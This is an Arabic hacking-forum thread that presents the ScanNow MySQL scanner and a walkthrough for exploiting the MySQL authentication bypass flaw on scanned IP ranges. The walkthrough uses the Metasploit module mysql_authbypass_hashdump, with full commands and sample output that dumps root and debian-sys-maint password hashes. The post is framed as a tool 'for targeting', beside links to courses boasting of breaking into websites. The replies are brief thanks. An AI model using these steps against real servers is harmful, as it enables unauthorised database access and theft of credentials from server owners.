1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ أداة ] ScanNow MySQL CVE

الموضوع في 'قسم الأدوات' بواسطة Al-JoKeR, بتاريخ ‏23 فبراير 2013.

كاتب الموضوع : Al-JoKeR المشاهدات : 1,976 الردود : 7 ‏23 فبراير 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Al-JoKeR
    ExpErt DeveloPer

    عضو منذ:
    ‏22 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    الوظيفة:
    طالب علم
    الإقامة:

    [​IMG]

    أخواني الكرام السلام عليكم

    [​IMG]

    #~ معلومات عن الاداة ~#

    #~ اداة : ScanNow MySQL
    #~ الشركة المبرمجة لها : rapid7
    وهي نفس الشركة المبرمجة لمشروع الميتاسبلويت
    #~ تتطلب الاداة وجود مترجم لغة جافا


    #~ مجانية الاستخدام ~#

    #~ طيب نجي لوظيفة الاداة ~#

    #~ اختبار قواعد البيانات من نوع Mysql
    من التخطي وتجاوز باسوورد الدخول
    #~ مفيدة بالاستهداف طبعا بحيث راح اشرح صور لها



    طيب نجي لشرح صور من البداية :


    [​IMG]

    ^

    هنا بعد تشغيل الاداة نملئ الفراغات بمعلومات
    ومن ثم نضغط على :
    Submit



    الخطوة التالية وهي تحديد الهدف وبامكانك تحديد رنج من الايبيات :

    [​IMG]

    ^

    هنا حددنا الايبيات من 1 الى 254

    الخطوة التالية وهي الفحص :

    [​IMG]

    ^

    جاري الفحص ... وعند الانتهاء يعطيك تقرير بسيط عن الفحص

    وعند وجود سيرفر مصاب بـ Mysql يتم استغلاله بمشروع الميتا سبلويت

    ويوجد استغلال اخر بسكربت مبرمج بلغة البايثون

    ولاكن كللها تستغل الضعف الامني المصاب به Mysql

    طيب بعد معرفة السيرفر المصاب بثغرة Mysql


    نستغل الثغرة بالميتا سبلويت على النحو التالي :


    كود PHP:
    msfconsole

    msf 
    > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

    msf  auxiliary
    (mysql_authbypass_hashdump) > set USERNAME root

    msf  auxiliary
    (mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

    msf  auxiliary
    (mysql_authbypass_hashdump) > run
    #~ الامر الاول :

    use auxiliary/scanner/mysql/mysql_authbypass_hashdump

    استخدمنا الاداة المساعدة لفحص الهدف واختبار التجاوز

    #~ الامر الثاني :

    set USERNAME root

    ضبطنا اسم المستخدم الافتراضي : root

    #~ الامر الثالث :

    set RHOSTS 127.0.0.1

    ضبطنا الريموت هوستس بمعنى المضيفات البعيدة وحددنا الايبي

    #~ الامر الرابع :

    run

    تشغيل الاداة


    وبعد نجاح العملية يظهر كالتالي :


    كود:
    [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
    [*] 127.0.0.1:3306 Authentication bypass is 10% complete
    [*] 127.0.0.1:3306 Authentication bypass is 20% complete
    [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
    
    
    [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
    [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    #~ هكذا تم الاستغلال وتم عرض باسوورد يوزر الـ root
    في برنامج قاعدة البيانات Mysql
    #~ تم حفظ الناتج بمستند نصي


    ... كذا انتهينا ...


    طيب نجي لتحميل الاداة من الموقع الرسمي :

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    #~ ان شاء الله يكون الموضوع واضح والشرح واضح ~#
     


    جاري تحميل الصفحة...
  2. غير متصل

    خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: ScanNow MySQL CVE

    الله يعطيك العافيه
    :{1}:
    واصل حبيبي
    &:":​
     


  3. غير متصل

    GeNx
    rank
    Developer

    عضو منذ:
    ‏23 فبراير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ScanNow MySQL CVE

    مشكور اخى
    سلمت يدك
    :{4}:​
     


  4. غير متصل

    غدر البشر
    rank
    Developer

    عضو منذ:
    ‏26 فبراير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: ScanNow MySQL CVE

    يعطيك العافيه&:":​
     


  5. غير متصل

    السيف القاتل
    rankrank
    Developer

    عضو منذ:
    ‏13 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: ScanNow MySQL CVE

    تسسسسسسسلم يابطل
    ماقصرت
     


  6. غير متصل

    Al-JoKeR
    ExpErt DeveloPer

    عضو منذ:
    ‏22 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    الوظيفة:
    طالب علم
    الإقامة:

    رد: ScanNow MySQL CVE

    حياكم الله اخواني الكرام
    شاكركم من اعماق قلبي​
     


  7. غير متصل

    Mr-Sp!R!T
    Developer

    عضو منذ:
    ‏21 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: ScanNow MySQL CVE

    وعليكم السلام ورحمه الله وبركاته

    مشكور حبي :{1}:
     


  8. غير متصل

    X-Ray
    rank
    Developer

    عضو منذ:
    ‏8 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    ELS
    الإقامة:

    رد: ScanNow MySQL CVE

    وعليكم السلام ورحمة الله وبركاته
    بارك الله فيك اخوي والله يسعدك يارب
    تقبل مروري
    تحياتي لسموك
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...